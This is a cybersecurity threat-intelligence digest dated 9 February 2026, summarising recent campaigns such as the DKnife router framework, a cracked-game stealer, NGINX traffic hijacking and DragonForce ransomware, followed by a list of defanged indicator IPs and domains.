The Cyber Byte - 9 February 2026
Recent reporting reveals a significant evolution in threat actor capabilities, highlighted by the discovery of sophisticated, modular attack frameworks and the increasing professionalization of cybercrime operations. A newly disclosed China-nexus Adversary-in-the-Middle (AitM) framework, DKnife, demonstrates the ability to compromise network edge devices for deep-packet inspection and malware delivery [6, 12]. Concurrently, the DragonForce ransomware group is restructuring into a cartel model to expand its operations, while high-volume stealer campaigns are leveraging cracked software to infect hundreds of thousands of users globally [5, 11]. A paradigm shift in vulnerability discovery is also emerging, with advanced AI models now demonstrating the capacity to find novel, high-severity 0-days in well-audited codebases [7].
Significant Cyber Incidents and Articles of Interest
DKnife AitM Framework Disclosed: A highly sophisticated, modular Adversary-in-the-Middle (AitM) framework named "DKnife" has been uncovered, operated by China-nexus threat actors since at least 2019. The framework targets Linux-based routers and edge devices, using a suite of seven ELF binary implants to perform deep-packet inspection, manipulate network traffic, and deliver malware. Key capabilities include DNS hijacking, hijacking binary downloads and Android application updates, and deploying the ShadowPad and DarkNimbus backdoors. While the campaign primarily targets Chinese-speaking users and services, infrastructure overlaps with the WizardNet backdoor suggest a potentially broader targeting scope. The framework's ability to operate at the gateway level allows for stealthy interception and manipulation of traffic for a wide range of devices, including PCs, mobile, and IoT [6, 12].
High-Volume Stealer Campaign Leverages Cracked Games: A massive and ongoing stealer campaign, active since at least April 2025, is distributing malware through cracked versions of popular video games like Far Cry, FIFA, and Assassin's Creed. The campaign has impacted over 400,000 victims globally, with an infection rate of over 5,000 new victims per day, concentrated in India, the United States, and Brazil. The attack uses a dual-stage loader chain, starting with the novel "RenEngine Loader," which abuses the legitimate Ren'Py visual novel game engine to evade detection, followed by a new variant of "HijackLoader." The final payload is the ACR stealer, which exfiltrates browser credentials, cookies, and cryptocurrency wallets [5].
Web Traffic Hijacking via Malicious NGINX Configurations: Threat actors, assessed with moderate confidence to be linked to the React2Shell vulnerability (CVE-2025-55182), are running a web traffic hijacking campaign using malicious NGINX server configurations. The attackers deploy a multi-stage toolkit of shell scripts to automatically inject malicious location blocks into NGINX configuration files. This intercepts legitimate user traffic and routes it through attacker-controlled proxy domains to facilitate further attacks. The campaign primarily targets websites with Asian top-level domains (.in, .id, .th), as well as government (.gov) and educational (.edu) domains [1].
Critical Authentication Bypass Vulnerability in Moxa Industrial Switches: A critical authentication bypass vulnerability, tracked as CVE-2024-12297 with a CVSS score of 9.2, affects multiple series of Moxa's industrial Ethernet switches. The flaw allows a remote, unauthenticated attacker to bypass login screens through brute-forcing or MD5 collision attacks, leading to full device compromise. Given that these switches are deployed in operational technology (OT) environments, successful exploitation could enable threat actors to disrupt industrial operations, intercept traffic, or pivot to other critical assets within the network. The vulnerability impacts the TN-A and TN-G series switches, and Moxa has released patches that must be obtained directly from technical support [2].
Multi-Stage Android Malware Impersonates Indian Government Services: An active Android malware campaign is targeting Indian users by impersonating Regional Transport Office (RTO) challan notifications and other government services. Distributed via WhatsApp and other messaging platforms, the malware uses a three-stage infection chain to maximize persistence and data theft. The stages include a dropper with cryptomining capabilities, a persistence and backend initialization module, and a final data theft payload that collects PII, financial data, and SMS messages. The campaign uses Google's Firebase for its command-and-control (C2) infrastructure and has successfully infected approximately 7,400 devices [3].
AI Models Demonstrate 0-Day Vulnerability Discovery Capabilities: The release of Claude Opus 4.6 marks a significant advancement in AI's ability to discover high-severity vulnerabilities in software. Unlike traditional fuzzers that rely on random inputs, the model reasons about code like a human security researcher, analyzing commit histories and identifying unsafe function calls to find bugs. In testing, the model discovered novel vulnerabilities in well-audited, hardened open-source projects such as GhostScript, OpenSC, and CGIF, some of which had gone undetected for decades. This development signals a potential paradigm shift in vulnerability research and disclosure, as AI-driven discovery may soon exceed the speed and scale of human experts [7].
Threat Actor Activity
TTPs (Tactics, Techniques, and Procedures)
Adversary-in-the-Middle (AitM) at the Network Edge: The DKnife framework is installed on compromised routers to perform deep-packet inspection, intercept traffic for specific applications like WeChat and Signal, and hijack legitimate software updates to deliver malware payloads such as ShadowPad [6, 12].
Bring-Your-Own-Vulnerable-Driver (BYOVD): Threat actors are weaponizing a legitimate but old driver from the EnCase forensic tool to terminate EDR and antivirus processes. The driver's certificate was revoked in 2010, but a loophole in Windows Driver Signature Enforcement allows drivers signed before July 2015 to load, bypassing modern security checks [10].
Abuse of Legitimate Software for Loading: The RenEngine Loader abuses the legitimate Ren'Py visual novel engine to masquerade as a game launcher. It uses the engine's archive feature to package and execute malicious Python scripts that decrypt and launch the second-stage HijackLoader [5].
Web Server Configuration Hijacking: Attackers are modifying NGINX server configurations by injecting malicious location blocks. These blocks use proxy_pass and rewrite directives to intercept specific traffic based on URL paths (e.g., /pg/, /slot/) and redirect it to attacker-controlled infrastructure [1].
Abuse of Trusted Cloud Services: Threat actors are leveraging free Google Firebase accounts to host C2 infrastructure for an Indian Android malware campaign and to send phishing emails from trusted firebaseapp.com domains, increasing the likelihood of bypassing email security filters [3, 9].
Sophisticated Social Engineering: macOS users are being targeted with fake CAPTCHA verification pages that install the Odyssey Stealer [4]. In a separate campaign, Indian Android users are lured with RTO-themed messages on WhatsApp to install multi-stage malware [3].
Affiliations and Operations
DragonForce Ransomware Cartel: The DragonForce Ransomware-as-a-Service (RaaS) group is evolving its operational model into a "cartel," allowing affiliates to create and manage their own ransomware brands under the DragonForce umbrella. The group has publicly called for cooperation with other major operations like LockBit and Qilin and has engaged in aggressive tactics against rival groups, including defacing the leak site of BlackLock and claiming that RansomHub has joined their cartel [11].
China-Nexus Actors (DKnife): The operators of the DKnife framework are assessed with high confidence to be China-nexus actors. This assessment is based on the use of Simplified Chinese in code and configuration files, the delivery of the ShadowPad backdoor, and the specific targeting of Chinese-language applications and services for data exfiltration [6, 12].
Russian-Aligned Actors (Odyssey Stealer): The Odyssey Stealer, a rebranded version of Poseidon Stealer, is being distributed in a campaign that targets macOS users globally but conspicuously avoids victims in CIS nations. This pattern of avoidance is often associated with Russian-aligned cybercriminal groups [4].
React2Shell Exploiters: Datadog assesses with moderate confidence that threat actors who previously exploited the React2Shell vulnerability (CVE-2025-55182) are now conducting the NGINX web traffic hijacking campaign, based on temporal correlation and shared infrastructure [1].
Targets and Geographic Focus
Global: The RenEngine/HijackLoader campaign delivered via cracked games has achieved a global reach, with over 400,000 victims and notable concentrations in India, the United States, and Brazil [5]. The Odyssey Stealer campaign targeting macOS users is also expanding globally, affecting users in the Americas, Europe, Asia, and Africa [4].
Asia-Pacific: The DKnife AitM framework primarily targets Chinese-speaking users and services [6, 12]. The NGINX hijacking campaign focuses on Asian TLDs, including those for India (.in), Indonesia (.id), Peru (.pe), Bangladesh (.bd), and Thailand (.th) [1].
India: A multi-stage Android malware campaign is specifically targeting users in India by impersonating government RTO challan notifications distributed via WhatsApp [3].
Sectors of Interest: The DragonForce ransomware group has shown a focus on the manufacturing, business services, technology, and construction sectors [11]. The NGINX hijacking campaign specifically targets government (.gov) and educational (.edu) TLDs [1]. The Moxa vulnerability directly impacts organizations in the Operational Technology (OT) sector [2].
Indicators to Watch
New Malware and Tooling
DKnife: A modular Linux-based AitM framework composed of seven ELF binaries designed for deployment on routers and edge devices. Its components perform functions including deep-packet inspection, data reporting, traffic forwarding, and malware delivery [6, 12].
RenEngine Loader: An initial-stage loader delivered via cracked game installers that abuses the Ren'Py game engine. It performs extensive sandbox checks before decrypting and executing the next-stage payload, HijackLoader [5].
Odyssey Stealer: A macOS information stealer that targets over 100 browser extensions, cryptocurrency wallets, browser credentials, and macOS Keychain passwords. It establishes persistence through LaunchDaemons [4].
NGINX Injection Toolkit: A collection of shell scripts (zx.sh, bt.sh, 4zdh.sh, etc.) designed to automate the process of finding and injecting malicious configurations into NGINX servers to hijack web traffic [1].
Emerging Campaigns and Phishing Trends
Abuse of Google Firebase for Phishing: Be aware of phishing campaigns using sender addresses ending in firebaseapp.com. Attackers are creating free developer accounts to leverage Google's trusted infrastructure and bypass email security filters, often impersonating major brands with urgent alerts or fake giveaways [9].
Rise in Digital Squatting for Cybercrime: Threat actors are increasingly using typosquatted and combosquatted domains to host phishing pages and deliver malware. This trend is linked to a rise in phishing attacks and business email compromise (BEC), with WIPO handling a record number of domain disputes in 2025 [8].
BYOVD Attacks with Legacy Drivers: Monitor for the loading of old but validly signed kernel drivers, especially those signed before July 29, 2015. Threat actors are actively using drivers with expired or revoked certificates, such as the EnCase driver, to gain kernel-level access and terminate EDR and antivirus software [10].
Suspicious Infrastructure and IOCs
NGINX Hijacking C2 IP: 158.94.210[.]227 [1].
NGINX Malicious Backend Domains: xzz.pier46[.]com, ide.hashbank8[.]com, th.cogicpt[.]org [1].
Odyssey Stealer C2 IP: 45.46.130[.]131 [4].
ACR Stealer C2 IP (RenEngine Campaign): 78[.]40[.]193[.]126 [5].
DragonForce Associated IPs: 193[.]233.175.213, 95[.]164.53.64, 91[.]108.244.85 [11].
